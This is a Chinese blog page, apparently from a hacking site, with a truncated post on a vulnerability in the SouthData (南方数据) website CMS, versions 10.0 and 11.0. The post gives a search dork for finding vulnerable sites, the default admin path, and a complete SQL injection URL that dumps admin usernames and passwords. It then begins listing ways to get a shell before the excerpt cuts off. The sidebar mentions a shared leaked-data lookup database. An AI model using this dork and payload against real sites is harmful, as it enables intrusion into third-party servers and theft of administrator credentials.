-
南方数据网站漏洞
漏洞影响版本 v10.0 v11.0 关键字:inurl:”HomeMarket.asp” 默认后台:/admin 直接爆用户密码: http://www.xxx.com/NewsType.asp?SmallClass=’%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20”=’ 拿shell方法貌似有4种: 1、注册用户上传拿shell,这...阅读全文阅读全文
博客搜索
近期文章
归档
- 2024年7月
- 2018年8月
- 2018年7月
- 2018年1月
- 2017年12月
- 2016年9月
- 2016年8月
- 2016年3月
- 2015年12月
- 2015年11月
- 2015年10月
- 2015年9月
- 2015年8月
- 2015年7月
- 2015年6月
- 2015年5月
- 2015年4月
- 2015年3月
- 2015年2月
- 2015年1月
- 2014年12月
- 2014年11月
- 2014年10月
- 2014年9月
- 2014年8月
- 2014年7月
- 2014年6月
- 2014年5月
- 2014年4月
- 2014年3月
- 2014年2月
- 2014年1月
- 2013年12月
- 2013年11月
- 2013年10月
- 2013年9月
- 2013年8月
- 2013年7月
- 2013年3月
近期评论
- 哈喽啊发表在《搜云社工库 30G数据库共享》
- 起雾了发表在《七行者IP代理验证V1.4 IP代理软件》
- 小唯发表在《搜云社工库 30G数据库共享》
- 风发表在《博主推荐【阿里云】云服务器特惠价只要99元!特惠热卖中。机会不能错过!》
- 稀奇发表在《【公告】本站摘除部分不稳定或者没挂本站连接》